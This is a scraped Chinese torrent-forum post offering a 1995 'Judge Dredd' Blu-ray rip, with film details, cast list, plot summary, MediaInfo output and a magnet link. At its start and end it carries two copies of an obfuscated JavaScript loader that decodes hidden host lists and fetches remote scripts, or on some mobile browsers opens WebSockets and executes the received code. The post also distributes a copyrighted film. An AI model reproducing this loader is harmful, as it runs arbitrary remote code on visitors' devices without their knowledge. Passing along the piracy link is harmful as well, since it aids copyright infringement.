特警判官[简繁字幕].Judge.Dredd.1995.BluRay.1080p.DTS-HD.MA5.1.x265.10bit 12.28GB

版主小s 1月前 201

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 特警判官 / 超时空战警 / 德雷德法官

◎片 名 Judge Dredd

◎年 代 1995

◎产 地 美国

◎类 别 动作 / 科幻 / 惊悚 / 犯罪

◎语 言 英语

◎上映日期 1995-06-30(美国)

◎IMDb链接 https://www.imdb.com/title/tt0113492/

◎豆瓣评分 6.6/10 (9167人评价)

◎豆瓣链接 https://movie.douban.com/subject/1296628/

◎片 长 96 分钟

◎导 演 丹尼·加农 Danny Cannon (id:1279998)

◎编 剧 斯蒂芬·E.德·索萨 Steven E. de Souza (id:1041340)

小威廉·威谢尔 William Wisher Jr. (id:1301118)

约翰·瓦格纳 John Wagner (id:1300260)

◎演 员 西尔维斯特·史泰龙 Sylvester Stallone (id:1047996)

阿曼德·阿山特 Armand Assante (id:1027842)

罗伯·施奈德 Rob Schneider (id:1040519)

戴安·琳恩 Diane Lane (id:1053615)

陈冲 Joan Chen (id:1044964)

马克斯·冯·叙多夫 Max von Sydow (id:1002675)

乔安娜·迈尔斯 Joanna Miles (id:1292045)

沈晓谦 Xiaoqian Shen (id:1347970)

童自荣 Zirong Tong (id:1318216)

Sam Barriscale Sam Barriscale (id:1277978)

艾伦·邦德巴-拉德 Alan Bond-Ballard (id:1246991)

尤尔根·普洛斯诺 Jürgen Prochnow (id:1019048)

詹姆斯·瑞马尔 James Remar (id:1013812)

詹姆斯·厄尔·琼斯 James Earl Jones (id:1013800)

艾文·布莱纳 Ewen Bremner (id:1004679)

巴萨扎·盖提 Balthazar Getty (id:1004656)

伊安·杜利 Ian Dury (id:1045424)

迪格·维恩 Dig Wayne (id:1165617)

史蒂夫·图森特 Steve Toussaint (id:1154996)

米奇·瑞恩 Mitch Ryan (id:1144169)

莫里斯·洛维斯 Maurice Ro?ves (id:1139838)

史蒂芬·洛德 Stephen Lord (id:1125224)

安格斯·麦金尼斯 Angus MacInnes (id:1117380)

布拉德利·拉威尔 Bradley Lavelle (id:1110938)

阿什莉·阿尔图斯 Ashley Artus (id:1056887)

斯科特·威尔森 Scott Wilson (id:1002813)

爱德华·R·普列斯曼 Edward R. Pressman (id:1002888)

安德鲁·G·瓦吉纳 Andrew G. Vajna (id:1023242)

亚伦·史维斯查 Alan Silvestri (id:1002819)

艾德里安·比德尔 Adrian Biddle (id:1009791)

Harry Keramidas Harry Keramidas (id:1276515)

Alex Mackie Alex Mackie (id:1290649)

杰基?伯奇 Jackie Burch (id:1279621)

彼得·扬 Peter Young (id:1301540)

凯文·菲普斯 Kevin Phipps (id:1051186)

莱斯利·汤姆金斯 Leslie Tomkins (id:1299377)

Emma Porteus Emma Porteus (id:1013071)

科林·贾米森 Colin Jamison (id:1287572)

Scott H. Eddo Scott H. Eddo (id:1089511)

克里斯·坎宁安 Chris Cunningham (id:1281605)

Faye De Bremaeker Faye De Bremaeker (id:1281987)

尼尔·戈顿 Neill Gorton (id:1055517)

保罗·艾巴斯卡 Paul Abascal (id:1050836)

尼克·杜德曼 Nick Dudman (id:1282763)

Michelle Taylor Michelle Taylor (id:1304342)

Christopher Newman Christopher Newman (id:1132033)

Mara Bryan Mara Bryan (id:1029720)

Daniel L. Smith Daniel L. Smith (id:1030122)

Steven Kosakura Steven Kosakura (id:1106559)

塞恩·莫里斯 Thaine Morris (id:1292551)

尼古拉斯·布鲁克斯 Nicholas Brooks (id:1045955)

Lisa Goldberg Lisa Goldberg (id:1095778)

布莱恩·哈纳伯 Brian Hanable (id:1090997)

Greg Juby Greg Juby (id:1287946)

Dwayne McClintock Dwayne McClintock (id:1056167)

乔尔·海内克 Joel Hynek (id:1276642)

大卫·K·斯图尔特 David K. Stewart (id:1298434)

José Granell José Granell (id:1285285)

约翰·盖耶塔 John Gaeta (id:1284377)

约翰·尼尔森 John Nelson (id:1133026)

David R. Hardberger David R. Hardberger (id:1006420)

比尔·尼尔 Bill Neil (id:1135014)

◎标 签 科幻 / 动作 / 史泰龙 / 美国 / 美国电影 / 1995 / 漫画改编 / 犯罪

◎简 介

这是一部典型的史泰龙式的科幻电影。2139年,科学高度发达。凭借高科技武器和过人身手,爵德(西尔维斯特?史泰龙 Sylvester Stallone 饰)成了梅洛城法官、警察和行刑人于一身的判官战警,他发现罪犯可以马上逮捕、马上判刑,死刑的话还可以马上执行。就是这样一个四出惩治罪恶的判官,这次竟然被诬蔑成杀人犯。

幸好有主席法官尽力相助,爵德才幸免一死,不过他被逐出了梅洛城。不甘心含冤受屈的爵德冒险潜回了梅洛城调查整件事的来龙去脉,犯罪分子里戈(阿曼德?阿山特 Armand Assante 饰)逐渐浮出了水面……

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 212598888124015926306457236193391265622 (0x9FF10E755A141837AA7528F560D1C756)

  4. Complete name : [email protected]DQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 12.3 GiB

  8. Duration : 1 h 36 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 18.3 Mb/s

  11. Encoded date : UTC 2021-10-29 12:07:31

  12. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  13. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 36 min

  21. Bit rate : 13.3 Mb/s

  22. Width : 1 920 pixels

  23. Height : 822 pixels

  24. Display aspect ratio : 2.35:1

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.351

  31. Stream size : 8.91 GiB (73%)

  32. Title : HEVC, [email protected]@High, 24/1.001 fps @ 13287 kbps

  33. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  34. Encoding settings : cpuid=533541111039 / frame-threads=4 / numa-pools=16 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x822 / interlace=0 / total-frames=138180 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=18.5 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  35. Language : English

  36. Default : Yes

  37. Forced : No

  38. Color range : Limited

  39. Color primaries : BT.709

  40. Transfer characteristics : BT.709

  41. Matrix coefficients : BT.709


  42. Audio

  43. ID : 2

  44. Format : DTS XLL

  45. Format/Info : Digital Theater Systems

  46. Commercial name : DTS-HD Master Audio

  47. Codec ID : A_DTS

  48. Duration : 1 h 36 min

  49. Bit rate mode : Variable

  50. Bit rate : 4 925 kb/s

  51. Channel(s) : 6 channels

  52. Channel layout : C L R Ls Rs LFE

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 93.750 FPS (512 SPF)

  55. Bit depth : 24 bits

  56. Compression mode : Lossless

  57. Stream size : 3.31 GiB (27%)

  58. Title : English DTS-HD Master Audio 5.1 @ 4932 kbps

  59. Language : English

  60. Default : Yes

  61. Forced : No


  62. Text #1

  63. ID : 3

  64. Format : PGS

  65. Codec ID : S_HDMV/PGS

  66. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  67. Duration : 1 h 34 min

  68. Bit rate : 38.8 kb/s

  69. Count of elements : 2650

  70. Stream size : 26.2 MiB (0%)

  71. Title : Eng/SUP

  72. Language : English

  73. Default : No

  74. Forced : No


  75. Text #2

  76. ID : 4

  77. Format : PGS

  78. Codec ID : S_HDMV/PGS

  79. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  80. Duration : 1 h 28 min

  81. Bit rate : 25.7 kb/s

  82. Count of elements : 2533

  83. Stream size : 16.2 MiB (0%)

  84. Title : Chs/SUP 简体

  85. Language : Chinese

  86. Default : Yes

  87. Forced : No


  88. Text #3

  89. ID : 5

  90. Format : PGS

  91. Codec ID : S_HDMV/PGS

  92. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  93. Duration : 1 h 28 min

  94. Bit rate : 26.1 kb/s

  95. Count of elements : 2533

  96. Stream size : 16.5 MiB (0%)

  97. Title : Cht/SUP 繁体

  98. Language : Chinese

  99. Default : No

  100. Forced : No


  101. Menu

  102. 00:00:00.000 : en:第 01 章

  103. 00:06:11.705 : en:第 02 章

  104. 00:15:59.834 : en:第 03 章

  105. 00:25:25.315 : en:第 04 章

  106. 00:31:53.662 : en:第 05 章

  107. 00:43:57.677 : en:第 06 章

  108. 00:48:17.061 : en:第 07 章

  109. 00:56:21.920 : en:第 08 章

  110. 01:05:21.459 : en:第 09 章

  111. 01:09:03.765 : en:第 10 章

  112. 01:10:57.420 : en:第 11 章

  113. 01:14:03.481 : en:第 12 章

  114. 01:17:25.891 : en:第 13 章

  115. 01:20:28.866 : en:第 14 章

  116. 01:26:01.156 : en:第 15 章

  117. 01:30:20.707 : en:第 16 章




复制代码


TAGS 动作 惊悚 犯罪 科幻

磁力链:
  • magnet:?xt=urn:btih:807BDE514A63CF79FD24461ECEF85A42909BADD7

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};